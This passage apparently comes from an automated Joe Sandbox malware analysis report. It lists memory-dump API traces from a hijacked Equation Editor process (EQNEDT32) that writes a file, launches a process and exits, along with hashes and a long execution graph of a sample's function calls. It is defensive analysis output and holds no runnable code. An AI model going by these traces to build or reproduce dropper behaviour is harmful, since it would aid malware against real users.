                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: a837bcd9c688a36b9fb585e1bb2c8fcefd4292e0d05c4690dd062954c88e286c
                                                                                              • Instruction ID: 0d6f39f30a00699718b721b51f2fca29271a0bb00484c797b0576256ca2eced6
                                                                                              • Opcode Fuzzy Hash: a837bcd9c688a36b9fb585e1bb2c8fcefd4292e0d05c4690dd062954c88e286c
                                                                                              • Instruction Fuzzy Hash: 8501B1B544C3C01FD322C3706D6EB91BF647F92604F0ECA8E95C44F0E3D2A5910993A6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0356076E: WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5
                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
                                                                                              • ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExitFileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3739231918-0
                                                                                              • Opcode ID: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                                                                              • Instruction ID: 2aaf90c3a9bef401a3c8f2ec77834c3efb1ce17473f72d0b6389cc3473f46a86
                                                                                              • Opcode Fuzzy Hash: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                                                                              • Instruction Fuzzy Hash: BFF0F671008346AFD702EE14DC41F6BBBAAFBC5B40F049D1DB1904B0B1D671D9488BA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0356063F
                                                                                                • Part of subcall function 03560659: LoadLibraryW.KERNEL32(03560649), ref: 03560659
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileLibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 2049390123-0
                                                                                              • Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                                                                              • Instruction ID: 23330bd961f2e2d39fa30b3c36da82f9e341c8f42fda1ea7f99969dfde1b877e
                                                                                              • Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                                                                              • Instruction Fuzzy Hash: 36E0127454C3C02AD232D7349D5EF95AE647FC1B04F0DC989A3C49F1E2C6A150049295
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                              • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                                              • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                              • Instruction ID: 3bc54e68393a0385b23fbab8a7b927d6e3045629c4bc99576ce982e8a57cbb67
                                                                                              • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                              • Instruction Fuzzy Hash: 71D052312026028FD304EB08D980E13F37AFFD8220B28D668E0004B66AC330E8A2CAD4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.3%
                                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                                              Signature Coverage:3.2%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:67
                                                                                              execution_graph 95560 a28402 95565 a281be 95560->95565 95563 a2842a 95570 a281ef try_get_first_available_module 95565->95570 95567 a283ee 95584 a227ec 26 API calls _abort 95567->95584 95569 a28343 95569->95563 95577 a30984 95569->95577 95573 a28338 95570->95573 95580 a18e0b 40 API calls 2 library calls 95570->95580 95572 a2838c 95572->95573 95581 a18e0b 40 API calls 2 library calls 95572->95581 95573->95569 95583 a1f2d9 20 API calls _abort 95573->95583 95575 a283ab 95575->95573 95582 a18e0b 40 API calls 2 library calls 95575->95582 95585 a30081 95577->95585 95579 a3099f 95579->95563 95580->95572 95581->95575 95582->95573 95583->95567 95584->95569 95587 a3008d ___scrt_is_nonwritable_in_current_image 95585->95587 95586 a3009b 95643 a1f2d9 20 API calls _abort 95586->95643 95587->95586 95590 a300d4 95587->95590 95589 a300a0 95644 a227ec 26 API calls _abort 95589->95644 95596 a3065b 95590->95596 95595 a300aa __wsopen_s 95595->95579 95646 a3042f 95596->95646 95599 a306a6 95664 a25221 95599->95664 95600 a3068d 95678 a1f2c6 20 API calls _abort 95600->95678 95603 a30692 95679 a1f2d9 20 API calls _abort 95603->95679 95604 a306ab 95605 a306b4 95604->95605 95606 a306cb 95604->95606 95680 a1f2c6 20 API calls _abort 95605->95680 95677 a3039a CreateFileW 95606->95677 95610 a300f8 95645 a30121 LeaveCriticalSection __wsopen_s 95610->95645 95611 a306b9 95681 a1f2d9 20 API calls _abort 95611->95681 95612 a30781 GetFileType 95615 a307d3 95612->95615 95616 a3078c GetLastError 95612->95616 95614 a30756 GetLastError 95683 a1f2a3 20 API calls 2 library calls 95614->95683 95686 a2516a 21 API calls 3 library calls 95615->95686 95684 a1f2a3 20 API calls 2 library calls 95616->95684 95617 a30704 95617->95612 95617->95614 95682 a3039a CreateFileW 95617->95682 95621 a3079a CloseHandle 95621->95603 95624 a307c3 95621->95624 95623 a30749 95623->95612 95623->95614 95685 a1f2d9 20 API calls _abort 95624->95685 95626 a307f4 95628 a30840 95626->95628 95687 a305ab 72 API calls 4 library calls 95626->95687 95627 a307c8 95627->95603 95632 a3086d 95628->95632 95688 a3014d 72 API calls 4 library calls 95628->95688 95631 a30866 95631->95632 95633 a3087e 95631->95633 95689 a286ae 95632->95689 95633->95610 95635 a308fc CloseHandle 95633->95635 95704 a3039a CreateFileW 95635->95704 95637 a30927 95638 a3095d 95637->95638 95639 a30931 GetLastError 95637->95639 95638->95610 95705 a1f2a3 20 API calls 2 library calls 95639->95705 95641 a3093d 95706 a25333 21 API calls 3 library calls 95641->95706 95643->95589 95644->95595 95645->95595 95647 a30450 95646->95647 95652 a3046a 95646->95652 95647->95652 95714 a1f2d9 20 API calls _abort 95647->95714 95650 a3045f 95715 a227ec 26 API calls _abort 95650->95715 95707 a303bf 95652->95707 95653 a304d1 95661 a30524 95653->95661 95718 a1d70d 26 API calls 2 library calls 95653->95718 95654 a304a2 95654->95653 95716 a1f2d9 20 API calls _abort 95654->95716 95657 a3051f 95659 a3059e 95657->95659 95657->95661 95658 a304c6 95717 a227ec 26 API calls _abort 95658->95717 95719 a227fc 11 API calls _abort 95659->95719 95661->95599 95661->95600 95663 a305aa 95665 a2522d ___scrt_is_nonwritable_in_current_image 95664->95665 95722 a22f5e EnterCriticalSection 95665->95722 95668 a25259 95726 a25000 95668->95726 95669 a25234 95669->95668 95673 a252c7 EnterCriticalSection 95669->95673 95675 a2527b 95669->95675 95670 a252a4 __wsopen_s 95670->95604 95674 a252d4 LeaveCriticalSection 95673->95674 95673->95675 95674->95669 95723 a2532a 95675->95723 95677->95617 95678->95603 95679->95610 95680->95611 95681->95603 95682->95623 95683->95603 95684->95621 95685->95627 95686->95626 95687->95628 95688->95631 95752 a253c4 95689->95752 95691 a286c4 95765 a25333 21 API calls 3 library calls 95691->95765 95692 a286be 95692->95691 95694 a286f6 95692->95694 95697 a253c4 __wsopen_s 26 API calls 95692->95697 95694->95691 95695 a253c4 __wsopen_s 26 API calls 95694->95695 95698 a28702 CloseHandle 95695->95698 95696 a2871c 95699 a2873e 95696->95699 95766 a1f2a3 20 API calls 2 library calls 95696->95766 95700 a286ed 95697->95700 95698->95691 95701 a2870e GetLastError 95698->95701 95699->95610 95703 a253c4 __wsopen_s 26 API calls 95700->95703 95701->95691 95703->95694 95704->95637 95705->95641 95706->95638 95708 a303d7 95707->95708 95709 a303f2 95708->95709 95720 a1f2d9 20 API calls _abort 95708->95720 95709->95654 95711 a30416 95721 a227ec 26 API calls _abort 95711->95721 95713 a30421 95713->95654 95714->95650 95715->95652 95716->95658 95717->95653 95718->95657 95719->95663 95720->95711 95721->95713 95722->95669 95734 a22fa6 LeaveCriticalSection 95723->95734 95725 a25331 95725->95670 95735 a24c7d 95726->95735 95728 a25012 95732 a2501f 95728->95732 95742 a23405 11 API calls 2 library calls 95728->95742 95731 a25071 95731->95675 95733 a25147 EnterCriticalSection 95731->95733 95743 a229c8 95732->95743 95733->95675 95734->95725 95740 a24c8a _abort 95735->95740 95736 a24cca 95750 a1f2d9 20 API calls _abort 95736->95750 95737 a24cb5 RtlAllocateHeap 95739 a24cc8 95737->95739 95737->95740 95739->95728 95740->95736 95740->95737 95749 a14ead 7 API calls 2 library calls 95740->95749 95742->95728 95744 a229d3 HeapFree 95743->95744 95745 a229fc _free 95743->95745 95744->95745 95746 a229e8 95744->95746 95745->95731 95751 a1f2d9 20 API calls _abort 95746->95751 95748 a229ee GetLastError 95748->95745 95749->95740 95750->95739 95751->95748 95753 a253d1 95752->95753 95754 a253e6 95752->95754 95767 a1f2c6 20 API calls _abort 95753->95767 95758 a2540b 95754->95758 95769 a1f2c6 20 API calls _abort 95754->95769 95757 a253d6 95768 a1f2d9 20 API calls _abort 95757->95768 95758->95692 95759 a25416 95770 a1f2d9 20 API calls _abort 95759->95770 95762 a253de 95762->95692 95763 a2541e 95771 a227ec 26 API calls _abort 95763->95771 95765->95696 95766->95699 95767->95757 95768->95762 95769->95759 95770->95763 95771->95762 95772 9ff7bf 95773 9ffcb6 95772->95773 95774 9ff7d3 95772->95774 95889 9faceb 23 API calls messages 95773->95889 95776 9ffcc2 95774->95776 95821 a0fddb 95774->95821 95890 9faceb 23 API calls messages 95776->95890 95779 9ff7e5 95779->95776 95780 9ff83e 95779->95780 95781 9ffd3d 95779->95781 95805 9fed9d messages 95780->95805 95831 a01310 95780->95831 95891 a61155 22 API calls 95781->95891 95784 a0fddb 22 API calls 95804 9fec76 messages 95784->95804 95785 9ffef7 95792 9fa8c7 22 API calls 95785->95792 95785->95805 95788 a44b0b 95897 a6359c 82 API calls __wsopen_s 95788->95897 95789 a44600 95789->95805 95892 9fa8c7 95789->95892 95792->95805 95794 9fa8c7 22 API calls 95794->95804 95796 9ffbe3 95799 a44bdc 95796->95799 95796->95805 95806 9ff3ae messages 95796->95806 95797 9fa961 22 API calls 95797->95804 95798 a100a3 29 API calls pre_c_initialization 95798->95804 95898 a6359c 82 API calls __wsopen_s 95799->95898 95800 a10242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95800->95804 95802 a101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95802->95804 95803 a44beb 95899 a6359c 82 API calls __wsopen_s 95803->95899 95804->95784 95804->95785 95804->95788 95804->95789 95804->95794 95804->95796 95804->95797 95804->95798 95804->95800 95804->95802 95804->95803 95804->95805 95804->95806 95807 a006a0 95804->95807 95888 a001e0 256 API calls 2 library calls 95804->95888 95806->95805 95896 a6359c 82 API calls __wsopen_s 95806->95896 95811 a00863 messages 95807->95811 95816 a006bd 95807->95816 95808 a00d36 95812 a00847 messages 95808->95812 95903 a0acd5 39 API calls 95808->95903 95810 a0082a messages 95810->95812 95815 a45ffd 95810->95815 95901 a0ce17 22 API calls messages 95810->95901 95811->95808 95811->95810 95811->95812 95811->95815 95812->95804 95814 a0081e 95814->95810 95820 a45e15 95814->95820 95818 a4600f 95815->95818 95902 a1cf65 39 API calls 95815->95902 95816->95808 95816->95810 95816->95811 95816->95812 95816->95814 95818->95804 95900 a1cf65 39 API calls 95820->95900 95825 a0fde0 95821->95825 95823 a0fdfa 95823->95779 95825->95823 95827 a0fdfc 95825->95827 95904 a1ea0c 95825->95904 95911 a14ead 7 API calls 2 library calls 95825->95911 95826 a1066d 95913 a132a4 RaiseException 95826->95913 95827->95826 95912 a132a4 RaiseException 95827->95912 95830 a1068a 95830->95779 95832 a017b0 95831->95832 95833 a01376 95831->95833 96179 a10242 5 API calls __Init_thread_wait 95832->96179 95835 a01390 95833->95835 95836 a46331 95833->95836 95916 a01940 95835->95916 95837 a4633d 95836->95837 96190 a7709c 256 API calls 95836->96190 95837->95804 95839 a017ba 95842 a017fb 95839->95842 96180 9f9cb3 95839->96180 95846 a46346 95842->95846 95848 a0182c 95842->95848 95843 a01940 9 API calls 95845 a013b6 95843->95845 95845->95842 95847 a013ec 95845->95847 96191 a6359c 82 API calls __wsopen_s 95846->96191 95847->95846 95871 a01408 __fread_nolock 95847->95871 96187 9faceb 23 API calls messages 95848->96187 95851 a01839 96188 a0d217 256 API calls 95851->96188 95852 a017d4 96186 a101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95852->96186 95855 a4636e 96192 a6359c 82 API calls __wsopen_s 95855->96192 95856 a0152f 95858 a463d1 95856->95858 95859 a0153c 95856->95859 96194 a75745 54 API calls _wcslen 95858->96194 95860 a01940 9 API calls 95859->95860 95862 a01549 95860->95862 95866 a01940 9 API calls 95862->95866 95872 a015c7 messages 95862->95872 95863 a0fddb 22 API calls 95863->95871 95865 a01872 96189 a0faeb 23 API calls 95865->96189 95876 a01563 95866->95876 95868 a0171d 95868->95804 95871->95851 95871->95855 95871->95856 95871->95863 95871->95872 95873 a463b2 95871->95873 95926 9fec40 95871->95926 96168 a0fe0b 95871->96168 95872->95865 95874 a01940 9 API calls 95872->95874 95878 a0167b messages 95872->95878 95950 a0effa 95872->95950 96007 a66ef1 95872->96007 96087 a7959f 95872->96087 96090 a5d4ce 95872->96090 96093 a6f0ec 95872->96093 96102 a7958b 95872->96102 96105 a6744a 95872->96105 96162 9f4f39 95872->96162 96195 a6359c 82 API calls __wsopen_s 95872->96195 96193 a6359c 82 API calls __wsopen_s 95873->96193 95874->95872 95876->95872 95879 9fa8c7 22 API calls 95876->95879 95878->95868 96178 a0ce17 22 API calls messages 95878->96178 95879->95872 95888->95804 95889->95776 95890->95781 95891->95805 95893 9fa8ea __fread_nolock 95892->95893 95894 9fa8db 95892->95894 95893->95805 95894->95893 95895 a0fe0b 22 API calls 95894->95895 95895->95893 95896->95805 95897->95805 95898->95803 95899->95805 95900->95820 95901->95810 95902->95818 95903->95812 95909 a23820 _abort 95904->95909 95905 a2385e 95915 a1f2d9 20 API calls _abort 95905->95915 95907 a23849 RtlAllocateHeap 95908 a2385c 95907->95908 95907->95909 95908->95825 95909->95905 95909->95907 95914 a14ead 7 API calls 2 library calls 95909->95914 95911->95825 95912->95826 95913->95830 95914->95909 95915->95908 95917 a01981 95916->95917 95918 a0195d 95916->95918 96196 a10242 5 API calls __Init_thread_wait 95917->96196 95925 a013a0 95918->95925 96198 a10242 5 API calls __Init_thread_wait 95918->96198 95921 a0198b 95921->95918 96197 a101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95921->96197 95922 a08727 95922->95925 96199 a101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95922->96199 95925->95843 95933 9fec76 messages 95926->95933 95927 a10242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95927->95933 95928 a101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95928->95933 95929 a44beb 96204 a6359c 82 API calls __wsopen_s 95929->96204 95930 a0fddb 22 API calls 95930->95933 95931 9ffef7 95939 9fa8c7 22 API calls 95931->95939 95943 9fed9d messages 95931->95943 95932 a006a0 41 API calls 95932->95933 95933->95927 95933->95928 95933->95929 95933->95930 95933->95931 95933->95932 95935 a44b0b 95933->95935 95936 a44600 95933->95936 95940 9fa8c7 22 API calls 95933->95940 95933->95943 95944 9ffbe3 95933->95944 95945 9fa961 22 API calls 95933->95945 95947 a100a3 29 API calls pre_c_initialization 95933->95947 95949 9ff3ae messages 95933->95949 96200 a001e0 256 API calls 2 library calls 95933->96200 96202 a6359c 82 API calls __wsopen_s 95935->96202 95941 9fa8c7 22 API calls 95936->95941 95936->95943 95939->95943 95940->95933 95941->95943 95943->95871 95944->95943 95946 a44bdc 95944->95946 95944->95949 95945->95933 96203 a6359c 82 API calls __wsopen_s 95946->96203 95947->95933 95949->95943 96201 a6359c 82 API calls __wsopen_s 95949->96201 96205 9f9c6e 95950->96205 95953 a0fddb 22 API calls 95955 a0f02b 95953->95955 95956 a0fe0b 22 API calls 95955->95956 95958 a0f03c 95956->95958 95957 a0f0a4 95966 a0f0b1 95957->95966 96243 9fb567 95957->96243 96248 9f6246 95958->96248 95959 a4f0a8 95959->95957 96308 a69caa 39 API calls 95959->96308 95964 a4f10a 95964->95966 95967 a4f112 95964->95967 96219 a0fa5b 95966->96219 95970 9fb567 39 API calls 95967->95970 95968 9f6246 CloseHandle 95971 a0f056 95968->95971 95975 a0f0b8 95970->95975 96257 9f7510 95971->96257 95974 9f6246 CloseHandle 95978 a0f06c 95974->95978 95976 a4f127 95975->95976 95977 a0f0d3 95975->95977 95981 a0fe0b 22 API calls 95976->95981 96224 9f6270 95977->96224 96280 9f5745 95978->96280 95984 a4f12c 95981->95984 95988 a4f140 95984->95988 96309 a0f866 ReadFile SetFilePointerEx 95984->96309 95985 a4f0a0 96307 9f6216 CloseHandle messages 95985->96307 95986 a0f085 96288 9f53de 95986->96288 95996 a4f144 __fread_nolock 95988->95996 96310 a60e85 22 API calls ___scrt_fastfail 95988->96310 95989 a0f0ea 95989->95996 96304 9f62b5 22 API calls 95989->96304 95995 a0f093 96303 9f53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95995->96303 95998 a0f0fe 96001 a0f138 95998->96001 96002 9f6246 CloseHandle 95998->96002 95999 a0f09a 95999->95957 96000 a4f069 95999->96000 96306 a5ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96000->96306 96001->95872 96004 a0f12c 96002->96004 96004->96001 96305 9f6216 CloseHandle messages 96004->96305 96005 a4f080 96005->95957 96008 9fa961 22 API calls 96007->96008 96009 a66f1d 96008->96009 96010 9fa961 22 API calls 96009->96010 96011 a66f26 96010->96011 96012 a66f3a 96011->96012 96013 9fb567 39 API calls 96011->96013 96014 9f7510 53 API calls 96012->96014 96013->96012 96015 a66f57 _wcslen 96014->96015 96016 a670bf 96015->96016 96017 a66fbc 96015->96017 96086 a670e9 96015->96086 96391 9f4ecb 96016->96391 96018 9f7510 53 API calls 96017->96018 96020 a66fc8 96018->96020 96025 9fa8c7 22 API calls 96020->96025 96029 a66fdb 96020->96029 96022 a670e5 96024 9fa961 22 API calls 96022->96024 96022->96086 96023 9f4ecb 94 API calls 96023->96022 96026 a6711a 96024->96026 96025->96029 96027 9fa961 22 API calls 96026->96027 96032 a67126 96027->96032 96028 a67027 96031 9f7510 53 API calls 96028->96031 96029->96028 96030 a67005 96029->96030 96033 9fa8c7 22 API calls 96029->96033 96576 9f33c6 96030->96576 96035 a67034 96031->96035 96036 9fa961 22 API calls 96032->96036 96033->96030 96038 a67047 96035->96038 96039 a6703d 96035->96039 96040 a6712f 96036->96040 96037 a6700f 96041 9f7510 53 API calls 96037->96041 96585 a5e199 GetFileAttributesW 96038->96585 96042 9fa8c7 22 API calls 96039->96042 96044 9fa961 22 API calls 96040->96044 96046 a6701b 96041->96046 96042->96038 96045 a67138 96044->96045 96049 9f7510 53 API calls 96045->96049 96050 9f6350 22 API calls 96046->96050 96047 a67050 96048 a67063 96047->96048 96051 9f4c6d 22 API calls 96047->96051 96053 9f7510 53 API calls 96048->96053 96059 a67069 96048->96059 96052 a67145 96049->96052 96050->96028 96051->96048 96413 9f525f 96052->96413 96055 a670a0 96053->96055 96586 a5d076 57 API calls 96055->96586 96056 a67166 96455 9f4c6d 96056->96455 96059->96086 96061 a671a9 96063 9fa8c7 22 API calls 96061->96063 96062 9f4c6d 22 API calls 96065 a67186 96062->96065 96064 a671ba 96063->96064 96458 9f6350 96064->96458 96065->96061 96068 9f6b57 22 API calls 96065->96068 96070 a6719b 96068->96070 96069 9f6350 22 API calls 96072 9f6b57 22 API calls 96070->96072 96072->96061 96086->95872 97244 a77f59 96087->97244 96089 a795af 96089->95872 97336 a5dbbe lstrlenW 96090->97336 96094 9f7510 53 API calls 96093->96094 96095 a6f126 96094->96095 97341 9f9e90 96095->97341 96097 a6f136 96098 a6f15b 96097->96098 96099 9fec40 256 API calls 96097->96099 96100 9f9c6e 22 API calls 96098->96100 96101 a6f15f 96098->96101 96099->96098 96100->96101 96101->95872 96103 a77f59 120 API calls 96102->96103 96104 a7959b 96103->96104 96104->95872 96106 a67474 96105->96106 96107 a67469 96105->96107 96111 9fa961 22 API calls 96106->96111 96137 a67554 96106->96137 96108 9fb567 39 API calls 96107->96108 96108->96106 96109 a0fddb 22 API calls 96110 a67587 96109->96110 96112 a0fe0b 22 API calls 96110->96112 96113 a67495 96111->96113 96114 a67598 96112->96114 96115 9fa961 22 API calls 96113->96115 96116 9f6246 CloseHandle 96114->96116 96117 a6749e 96115->96117 96118 a675a3 96116->96118 96119 9f7510 53 API calls 96117->96119 96121 9fa961 22 API calls 96118->96121 96120 a674aa 96119->96120 96122 9f525f 22 API calls 96120->96122 96123 a675ab 96121->96123 96124 a674bf 96122->96124 96125 9f6246 CloseHandle 96123->96125 96126 9f6350 22 API calls 96124->96126 96127 a675b2 96125->96127 96128 a674f2 96126->96128 96129 9f7510 53 API calls 96127->96129 96130 a6754a 96128->96130 96132 a5d4ce 4 API calls 96128->96132 96131 a675be 96129->96131 96134 9fb567 39 API calls 96130->96134 96133 9f6246 CloseHandle 96131->96133 96135 a67502 96132->96135 96136 a675c8 96133->96136 96134->96137 96135->96130 96138 a67506 96135->96138 96140 9f5745 5 API calls 96136->96140 96137->96109 96160 a676a4 96137->96160 96139 9f9cb3 22 API calls 96138->96139 96142 a67513 96139->96142 96141 a675e2 96140->96141 96143 a676de GetLastError 96141->96143 96145 a675ea 96141->96145 97378 a5d2c1 26 API calls 96142->97378 96146 a676f7 96143->96146 96147 9f53de 27 API calls 96145->96147 97382 9f6216 CloseHandle messages 96146->97382 96149 a675f8 96147->96149 97379 9f53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96149->97379 96150 a6751c 96150->96130 96152 a67645 96153 a0fddb 22 API calls 96152->96153 96156 a67679 96153->96156 96154 a675ff 96154->96152 96155 a67619 96154->96155 97380 a5ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96155->97380 96158 9fa961 22 API calls 96156->96158 96159 a67686 96158->96159 96159->96160 97381 a5417d 22 API calls __fread_nolock 96159->97381 96160->95872 96163 9f4f43 96162->96163 96165 9f4f4a 96162->96165 96164 a1e678 67 API calls 96163->96164 96164->96165 96166 9f4f6a FreeLibrary 96165->96166 96167 9f4f59 96165->96167 96166->96167 96167->95872 96170 a0fddb 96168->96170 96169 a1ea0c ___std_exception_copy 21 API calls 96169->96170 96170->96169 96171 a0fdfa 96170->96171 96174 a0fdfc 96170->96174 97383 a14ead 7 API calls 2 library calls 96170->97383 96171->95871 96173 a1066d 97385 a132a4 RaiseException 96173->97385 96174->96173 97384 a132a4 RaiseException 96174->97384 96177 a1068a 96177->95871 96178->95878 96179->95839 96181 9f9cc2 _wcslen 96180->96181 96182 a0fe0b 22 API calls 96181->96182 96183 9f9cea __fread_nolock 96182->96183 96184 a0fddb 22 API calls 96183->96184 96185 9f9d00 96184->96185 96185->95852 96186->95842 96187->95851 96188->95865 96189->95865 96190->95837 96191->95872 96192->95872 96193->95872 96194->95876 96195->95872 96196->95921 96197->95918 96198->95922 96199->95925 96200->95933 96201->95943 96202->95943 96203->95929 96204->95943 96206 9f9c7e 96205->96206 96207 a3f545 96205->96207 96212 a0fddb 22 API calls 96206->96212 96208 a3f556 96207->96208 96311 9f6b57 96207->96311 96323 9fa6c3 96208->96323 96211 a3f560 96211->96211 96213 9f9c91 96212->96213 96214 9f9cac 96213->96214 96215 9f9c9a 96213->96215 96217 9fa961 22 API calls 96214->96217 96216 9f9cb3 22 API calls 96215->96216 96218 9f9ca2 96216->96218 96217->96218 96218->95953 96218->95959 96340 9f54c6 96219->96340 96222 9f54c6 3 API calls 96223 a0fa9a 96222->96223 96223->95975 96225 a0fe0b 22 API calls 96224->96225 96226 9f6295 96225->96226 96227 a0fddb 22 API calls 96226->96227 96228 9f62a3 96227->96228 96229 a0f141 96228->96229 96230 a0f188 96229->96230 96231 a0f14c 96229->96231 96232 9fa6c3 22 API calls 96230->96232 96231->96230 96233 a0f15b 96231->96233 96241 a5caeb 96232->96241 96235 a0f170 96233->96235 96237 a0f17d 96233->96237 96234 a5cb1a 96234->95989 96346 a0f18e 96235->96346 96353 a5cbf2 26 API calls 96237->96353 96239 a0f179 96239->95989 96241->96234 96354 a5ca89 ReadFile SetFilePointerEx 96241->96354 96355 9f49bd 22 API calls __fread_nolock 96241->96355 96244 9fb578 96243->96244 96245 9fb57f 96243->96245 96244->96245 96383 a162d1 39 API calls _strftime 96244->96383 96245->95964 96247 9fb5c2 96247->95964 96249 9f625f 96248->96249 96250 9f6250 96248->96250 96249->96250 96251 9f6264 CloseHandle 96249->96251 96252 9fa961 96250->96252 96251->96250 96253 a0fe0b 22 API calls 96252->96253 96254 9fa976 96253->96254 96255 a0fddb 22 API calls 96254->96255 96256 9fa984 96255->96256 96256->95968 96258 9f7525 96257->96258 96274 9f7522 96257->96274 96259 9f752d 96258->96259 96260 9f755b 96258->96260 96384 a151c6 26 API calls 96259->96384 96264 9f756d 96260->96264 96269 a3500f 96260->96269 96270 a350f6 96260->96270 96262 9f753d 96268 a0fddb 22 API calls 96262->96268 96385 a0fb21 51 API calls 96264->96385 96265 a3510e 96265->96265 96271 9f7547 96268->96271 96273 a0fe0b 22 API calls 96269->96273 96279 a35088 96269->96279 96387 a15183 26 API calls 96270->96387 96272 9f9cb3 22 API calls 96271->96272 96272->96274 96275 a35058 96273->96275 96274->95974 96276 a0fddb 22 API calls 96275->96276 96277 a3507f 96276->96277 96278 9f9cb3 22 API calls 96277->96278 96278->96279 96386 a0fb21 51 API calls 96279->96386 96281 9f575c CreateFileW 96280->96281 96282 a34035 96280->96282 96283 9f577b 96281->96283 96282->96283 96284 a3403b CreateFileW 96282->96284 96283->95985 96283->95986 96284->96283 96285 a34063 96284->96285 96286 9f54c6 3 API calls 96285->96286 96287 a3406e 96286->96287 96287->96283 96289 9f53f3 96288->96289 96301 9f53f0 messages 96288->96301 96290 9f54c6 3 API calls 96289->96290 96289->96301 96291 9f5410 96290->96291 96292 9f541d 96291->96292 96293 a33f4b 96291->96293 96294 a0fe0b 22 API calls 96292->96294 96295 a0fa5b 3 API calls 96293->96295 96296 9f5429 96294->96296 96295->96301 96388 9f5722 96296->96388 96299 9f9a40 2 API calls 96300 9f543f 96299->96300 96302 9f54c6 3 API calls 96300->96302 96301->95995 96302->96301 96303->95999 96304->95998 96305->96001 96306->96005 96307->95959 96308->95959 96309->95988 96310->95996 96312 a34ba1 96311->96312 96313 9f6b67 _wcslen 96311->96313 96330 9f93b2 96312->96330 96316 9f6b7d 96313->96316 96317 9f6ba2 96313->96317 96315 a34baa 96315->96315 96329 9f6f34 22 API calls 96316->96329 96319 a0fddb 22 API calls 96317->96319 96321 9f6bae 96319->96321 96320 9f6b85 __fread_nolock 96320->96208 96322 a0fe0b 22 API calls 96321->96322 96322->96320 96324 9fa6dd 96323->96324 96325 9fa6d0 96323->96325 96326 a0fddb 22 API calls 96324->96326 96325->96211 96327 9fa6e7 96326->96327 96328 a0fe0b 22 API calls 96327->96328 96328->96325 96329->96320 96331 